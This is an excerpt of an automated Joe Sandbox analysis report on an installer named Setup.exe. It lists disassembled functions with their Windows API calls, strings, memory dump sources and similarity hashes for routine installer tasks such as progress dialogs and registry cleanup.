                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                                                                                                • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                                                                                                                                                                                Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(0001AA00,00000064,?), ref: 00403295
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                                                                                                • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                                                                                                                                                                                Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00404457
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: %u.%u%s%s$@rD
                                                                                                                                                                                                                                                                • API String ID: 3540041739-1813061909
                                                                                                                                                                                                                                                                • Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                                                                                                • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                                                                                                                                                                                Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                • String ID: *?|<>/":
                                                                                                                                                                                                                                                                • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                                                                                                • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                                                                                                                                                                                Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                                                                                                • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                                                                                                                                                                                Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                                                                                                • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                                                                                                                                                                                                                Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                                                                                                • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                                                                                                                                                                                                                Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                                                                                                • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                                                                                                                                                                                Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                                                                                                • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                                                                                                                                                                                Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                                                                                • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                                                                                                                                                                                Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                                                                                                                                                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                • String ID: $@rD
                                                                                                                                                                                                                                                                • API String ID: 3748168415-881980237
                                                                                                                                                                                                                                                                • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                                                                                • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
